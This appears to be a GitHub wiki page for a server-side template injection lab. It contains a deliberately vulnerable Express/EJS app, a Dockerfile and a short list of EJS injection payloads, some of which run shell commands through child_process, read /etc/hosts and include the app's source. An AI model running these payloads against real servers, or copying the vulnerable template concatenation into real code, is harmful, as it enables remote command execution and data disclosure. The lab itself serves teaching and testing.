SSTI nodejs 02 - yujitounai/helloworld GitHub Wiki
// Bootstrap for a deliberately vulnerable server-side template injection (SSTI)
// demo built on Express and EJS. Run it only in an isolated lab environment.
const express = require('express');
const bodyParser = require('body-parser');
// Template engine that renders the page source assembled in getHTML().
const ejs = require('ejs');

const app = express();
const port = 5063;

// Accept both JSON and form-encoded request bodies.
app.use(bodyParser.json());
// extended: true parses the form body with the qs library, so a field such as
// `name` can arrive as a nested object or array and not only as a string.
app.use(bodyParser.urlencoded({ extended: true }));
/**
 * Render the demo page, greeting whatever value was submitted.
 *
 * INTENTIONALLY VULNERABLE (SSTI): `input` is concatenated into the EJS
 * template *source* before ejs.render() runs, so any EJS tags it contains are
 * evaluated on the server with the privileges of the Node.js process.
 *
 * The safe pattern is to keep the template text constant, reference the value
 * as data (`<p>Hello <%= name %></p>`), and pass it through the locals object
 * (`{ name: input }`), so that it is HTML-escaped and never parsed as template
 * code.
 *
 * @param {*} input - Untrusted value taken from the request; not validated here.
 * @returns {string} The rendered HTML document.
 */
function getHTML(input) {
  // Logs the raw, attacker-controlled value; useful in a lab to see what arrived.
  console.log(input);

  const pageHead = `<!DOCTYPE html><html><body>
<form action="/" method="post">
First name:<br>
<input type="text" name="name" value="">
<input type="submit" value="Submit">
</form><p>Hello `;
  const pageTail = `</p></body></html>`;

  // Root cause: request data becomes part of the template source.
  const templateSource = pageHead + input + pageTail;

  // The locals object is fixed; the submitted value never goes through it.
  return ejs.render(templateSource, { name: "Venus" });
}
// POST /: read the submitted `name` and return the rendered page.
app.post('/', (request, response) => {
  // request.param() looks the name up in route params, then body, then query,
  // and falls back to "" here. It is deprecated in Express 4 and removed in
  // Express 5. The value is untrusted and is handed to getHTML() unvalidated.
  const submittedName = request.param('name', "");
  response.send(getHTML(submittedName));
});
// GET /: serve the form with an empty greeting (no request data is used).
app.get('/', (request, response) => {
  response.send(getHTML(""));
});
// Start the HTTP server. No host is passed, so Node binds to all interfaces;
// keep this intentionally vulnerable app on an isolated network.
app.listen(port, (err) => {
  if (!err) {
    console.log(`server is listening on ${port}`);
    return;
  }
  return console.log('something bad happened', err);
});
- Dockerfile
# Lab image for the intentionally vulnerable EJS app; build and run it only on an isolated host/network.
# NOTE(review): node:6 is an end-of-life Node.js line that no longer receives security fixes; acceptable only for a throwaway lab.
FROM node:6
# Copies the application sources from src/ into /home inside the image.
COPY src/ /home
# NOTE(review): no WORKDIR appears in the lines shown, so these npm commands run in the image's default directory, not in /home — confirm against the full Dockerfile.
RUN npm install
# ejs and express are installed without a version pin, so each build resolves whatever npm serves at that time.
RUN npm install ejs
RUN npm install express
# NOTE(review): no USER or CMD is visible here; if the full file sets no USER, the app presumably runs as the base image's default user (likely root), which raises the impact of the template injection — confirm.
https://github.com/DiogoMRSilva/websitesVulnerableToSSTI/blob/master/javascript/EJS/
<%- 7*7 %>
<%= 7*7 %>
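どちらでもよさげ(`<%=` は HTML エスケープあり、`<%-` はエスケープなしで出力するが、どちらもサーバ側で式を評価するので結果は同じ 49 になる。出力のエスケープではテンプレートインジェクションは防げない)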
<%- global.process.mainModule.require('child_process').execSync('ls').toString() %>
<%- global.process.mainModule.require('child_process').execSync('cat /etc/hosts') %>
<%- include('../../../app.js') %>